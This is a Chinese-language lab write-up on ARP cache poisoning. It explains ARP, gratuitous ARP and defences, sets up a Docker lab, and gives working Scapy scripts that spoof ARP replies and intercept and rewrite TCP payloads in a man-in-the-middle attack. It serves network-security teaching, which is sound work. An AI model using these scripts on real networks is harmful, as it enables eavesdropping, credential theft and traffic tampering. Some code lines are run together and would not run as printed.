参考资料：
TCP/IP Attacks – ARP Cache Poisoning Fundamentals Explained
ARP缓存中毒攻击

一、相关知识

1.什么是arp（地址解析协议）

ARP工作在OSI模型的第二层（数据链路层）和第三层（网络层）之间。

以下是ARP的基本工作流程：
1）ARP请求
当设备A需要向设备B发送数据时，它需要知道设备B的MA C地址。
设备A在其ARP缓存中查找设备B的IP地址是否已经对应了一个MAC地址。如果找不到，设备A会发送一个ARP请求。
ARP请求是一个广播消息，包含发送方的IP地址和MAC地址，以及目标设备的IP地址。
2）ARP响应
网络中的所有设备都会接收并检查这个ARP请求。只有目标设备（设备B）会进行响应。
设备B接收到ARP请求后，发送一个ARP响应，包含自己的MAC地址。
设备A接收到ARP响应后，将设备B的IP地址和MAC地址映射存储在其ARP缓存中。
3）数据传输
设备A现在有了设备B的MAC地址，可以通过数据链路层进行数据传输。

2.什么是免费arp

（1）简介

免费ARP（Gratuitous ARP）是一种特殊的ARP请求，设备发送这种请求并不是为了解析某个IP地址，而是为了主动通知网络中的其他设备关于自身的IP地址和MAC地址的映射。免费ARP消息中，源IP地址和目标IP地址都是发送设备的IP地址。以下是免费ARP的主要应用和工作原理。

（2）主要应用

1）IP地址冲突检测：
当设备启动并获取IP地址后，会发送一个免费ARP请求。
如果网络中存在另一台设备拥有相同的IP地址，该设备会响应此请求，从而检测到IP地址冲突。

2）ARP缓存更新：
当设备的MAC地址发生变化（例如，网卡更换或虚拟机迁移）时，发送免费ARP请求通知网络中的其他设备更新它们的ARP缓存。
这有助于保持网络中ARP缓存的最新状态，避免通信问题。

3）网络冗余和负载均衡：
在使用VRRP（虚拟路由器冗余协议）和HSRP（热备份路由协议）等协议时，主路由器发生切换后，会发送免费ARP请求通知网络中的设备更新ARP缓存，以指向新的主路由器。

（3）代码

from scapy.all import *# 构建免费ARP请求包
gratuitous_arp = ARP(op=1, psrc="192.168.1.100", hwsrc="aa:bb:cc:dd:ee:ff", pdst="192.168.1.100")# 发送免费ARP请求
send(gratuitous_arp, verbose=False)

3.什么是arp缓存中毒

（1）简介

ARP缓存中毒（ARP Cache Poisoning），也称为ARP欺骗（ARP Spoofing），是一种网络攻击技术，攻击者通过发送伪造的ARP（地址解析协议）消息到局域网（LAN），将其MAC地址与另一台合法计算机的IP地址相关联，从而导致网络数据包被错误地发送到攻击者的设备。

（2）过程

1）伪造ARP响应：攻击者向局域网中的其他设备发送伪造的ARP响应消息。这些伪造消息包含攻击者的MAC地址和被攻击者的IP地址。
2）更新ARP缓存：接收到伪造ARP响应的设备会更新其ARP缓存，错误地将攻击者的MAC地址与合法的IP地址相关联。
3）数据包重定向：由于设备的ARP缓存已被中毒，发送到受害者IP地址的数据包会被错误地发送到攻击者的设备。

（3）目的

1）中间人攻击（Man-in-the-Middle Attack）：攻击者可以截获、监视和修改在两个设备之间传输的数据。
2）拒绝服务（Denial of Service, DoS）：攻击者可以通过中毒多个设备的ARP缓存，导致网络中断。
3）网络嗅探（Network Sniffing）：攻击者可以捕获敏感信息，如用户名、密码、银行信息等。

（4）防御

1）静态ARP表：在设备上配置静态ARP映射，防止动态更新。
2）ARP检测工具：使用工具监控和检测ARP欺骗行为。
3）加密通信：使用加密协议保护敏感数据，防止被篡改和窃取。

二、arp缓存中毒 攻击过程

1.搭建网络

（1）网络拓扑

（2）搭建网络的代码

在 VM 上创建 docker 网络 extranet 
$ sudo docker network create --subnet=10.0.2.0/24 --gateway=10.0.2.8 --opt 
"com.docker.network.bridge.name"="docker1" extranet 
在 VM 上创建 docker 网络 intranet 
$ sudo docker network create --subnet=192.168.60.0/24 --gateway=192.168.60.1 --
opt "com.docker.network.bridge.name"="docker2" intranet 
在 VM 上新开一个终端，创建并运行容器 Server2
$sudo docker run -it --name=Server2 --hostname=Server2 --net=extranet --
ip=10.0.2.7 --privileged "seedubuntu" /bin/bash 
在 VM 上新开一个终端，创建并运行容器 HostA
$sudo docker run -it --name=HostA --hostname=HostA --net=intranet --
ip=192.168.60.2 --privileged "seedubuntu" /bin/bash 
在 VM 上新开一个终端，创建并运行容器 HostM
$sudo docker run -it --name=HostM --hostname=HostM --net=intranet --
ip=192.168.60.3 --privileged "seedubuntu" /bin/bash

2.查看ip对应的MAC

（1）docker2（192.168.60.1）的MAC

命令： ifconfig

结果：

HostB（192.168.60.1）的MAC为02:42:53:be:7a:36

（2）HostA和HostM的MAC

让HostA和HostM互相Ping，再用arp -a查看arp表：

HostA（192.168.60.2）的MAC为 02:42:c0:a8:3c:02

HostM（192.168.60.3）的MAC为 02:42:c0:a8:3c:03

3.arp缓存中毒攻击

（1）代码

在桌面建立一个arp_request.py文件：

from scapy.all import *
from time import *# Machine A's informaton
IP_A = "192.168.60.2"
MAC_A = "02:42:c0:a8:3c:02"# Machine B's informaton
IP_B = "192.168.60.1"
MAC_B = "02:42:53:be:7a:36"# Attacker Machine's informaton
IP_M = "192.168.60.3"
MAC_M = "02:42:c0:a8:3c:03"print("SENDING SPOOFED ARP REPLY.........")# Construct spoofed ARP sent to machine A
ether1 = Ether()
ether1.dst = MAC_A
arp1 = ARP()
arp1.psrc = IP_B
arp1.hwsrc = MAC_M
arp1.pdst = IP_A
arp1.op = 1
frame1 = ether1/arp1# Construct spoofed ARP sent to machine B
ether2 = Ether()
ether2.dst = MAC_B
arp2 = ARP()
arp2.psrc = IP_A
arp2.hwsrc = MAC_M
arp2.pdst = IP_B
arp2.op = 1
frame2 = ether2/arp2while 1:sendp(frame1)sendp(frame2)sleep(5)

首先需要启动容器HostA和HostM：
sudo docker start HostA
sudo docker start HostM

将arp_request.py文件从主机移到HostM容器里：
sudo docker cp arp_request.py HostM:/

重新开一个终端，进入HostA，并ping192.168.60.1和192.168.60.3：
sudo docker exec -it HostA bin/bash
ping 192.168.60.1
ping 192.168.60.3

重新开一个终端，进入HostM，运行上述代码文件：
sudo docker exec -it HostM bin/bash
python3 arp_request.py

在HostA终端查看HostA的arp表：
arp -a
可以发现，HostB和HostM的MAC此时是一样的。

4.中间人攻击

（1）首先应该打开HostM的IP转发：sudo sysctl -w net.ipv4.ip_forward=1

（2）在HostA和HostB之间建立网络连接。
例如，可以使用netcat：
在HostB上启动监听：nc -l -p 12345
在HostA上连接HostB：nc 192.168.60.1 12345

（3）关闭HostM的IP转发
sudo sysctl -w net.ipv4.ip_forward=0

（4）HostM运行代码middle.py

#!/usr/bin/python
from scapy.all import *VM_A_IP = "192.168.60.2"
VM_B_IP = "192.168.60.1"MAC_A = "02:42:c0:a8:3c:02"
MAC_B = "02:42:53:be:7a:36"def spoof_pkt(pkt):if pkt[IP].src == VM_A_IP and pkt[IP].dst == VM_B_IP and pkt[TCP].payload:print("ARP Cache Poisoning Man-in-the-MiddleAttacking...")data = pkt[TCP].payload.loadprint("Original Packet.........")print("Source IP: ", pkt[IP].src)print("Destination IP: ", pkt[IP].dst)print("Message: ", data)print("Message Length: %d" % (len(data)))newpkt = IP(bytes(pkt[IP]))del (newpkt.chksum)del (newpkt[TCP].payload)del (newpkt[TCP].chksum)newdata = data.replace(b'123', b'456')newpkt = newpkt/newdataprint("Spoofed Packet.........")print("Source IP : ", newpkt[IP].src)print("Destination IP :", newpkt[IP].dst)print("Message: ", newdata)print("Message Length: %d" % (len(newdata)))send(newpkt)elif pkt[IP].src == VM_B_IP and pkt[IP].dst == VM_A_IP:print("The message is sent from host B to host A...")newpkt = pkt[IP]send(newpkt)f = 'tcp and (ether src ' + MAC_A + ' or ' + \'ether src ' + MAC_B + ' )'
pkt = sniff(iface="eth0", filter=f, prn=spoof_pkt)

此时，A给B发送123，B收到的是456